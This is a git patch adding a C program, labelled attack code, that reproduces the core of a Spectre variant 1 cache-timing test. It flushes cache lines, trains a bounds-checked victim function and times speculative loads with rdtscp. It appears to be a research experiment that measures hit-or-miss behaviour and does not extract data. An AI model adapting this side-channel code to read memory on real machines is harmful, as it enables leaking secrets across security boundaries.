From 00216d7327a9c7214e3b9a19b45f1cfc47a8c036 Mon Sep 17 00:00:00 2001
From: Iru Cai <mytbk920423@gmail.com>
Date: Thu, 28 Feb 2019 17:08:59 +0800
Subject: attack code and exp script

---
 attack_code/spectre_rdtscp.c | 77 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 77 insertions(+)
 create mode 100644 attack_code/spectre_rdtscp.c

(limited to 'attack_code/spectre_rdtscp.c')

diff --git a/attack_code/spectre_rdtscp.c b/attack_code/spectre_rdtscp.c
new file mode 100644
index 000000000..f4700d2cd
--- /dev/null
+++ b/attack_code/spectre_rdtscp.c
@@ -0,0 +1,77 @@
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <x86intrin.h> /* for rdtscp and clflush */
+
+/********************************************************************
+Victim code.
+********************************************************************/
+unsigned int array1_size = 16;
+uint8_t unused1[64];
+uint8_t array1[640] = {};
+
+uint8_t temp;
+
+void victim_function(size_t x) {
+  if (x < array1_size) {
+    temp &= array1[x];
+  }
+}
+
+/********************************************************************
+Analysis code
+********************************************************************/
+
+size_t malicious_x = 128;//index to array1
+#define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
+
+/* Report best guess in value[0] and runner-up in value[1] */
+void testSpec(size_t fetch_index) {
+  int tries, i, j, k, mix_i, junk = 0;
+  register uint64_t time1, time2;
+  volatile uint8_t * addr;
+
+  for (tries = 20; tries > 0; tries--) {
+
+    _mm_clflush( & array1_size); //make branch resolved sloowly
+    _mm_clflush( array1+malicious_x ); //flush out-of-boundary address
+    _mm_clflush( array1+fetch_index ); //flush within-boundary address
+
+    for (volatile int z = 0; z < 1000; z++) {} /* Delay (can also mfence) */
+   
+    /*fetch one element in the array*/
+    victim_function(fetch_index);
+    
+      
+      for (volatile int z = 0; z < 1000; z++) {} /* Delay (can also mfence) */
+      
+      time1 = __rdtscp( &junk ); 
+      time1 = __rdtscp( &junk ); 
+      
+      addr = array1 + malicious_x;
+      junk = * addr; // MEMORY ACCESS TO TIME  
+      
+      time2 = __rdtscp( &junk ) - time1; // READ TIMER & COMPUTE ELAPSED TIME  
+      time2 = __rdtscp( &junk ) - time1; // READ TIMER & COMPUTE ELAPSED TIME  
+      
+      
+      printf("time = %ld\n", time2);
+    }
+}
+
+
+
+int main(int argc, const char * * argv) {
+
+    printf("malicious_x = %p... ", (void * ) malicious_x);
+    
+    printf("fetch 0th element, \nno misprediction, \nsuppose to see miss + no squash\n");
+    testSpec(0);
+    
+    printf("fetch malicious_x, \nmispredict with speculative load, \nsuppose to see hit + squash\n");
+    testSpec(malicious_x);
+    
+    printf("fetch malicious_x * 2, \nmispredict with speculative load different address, \nsuppose to see miss + squash\n");
+    testSpec(malicious_x*2);
+    return (0);
+}
-- 
cgit v1.2.3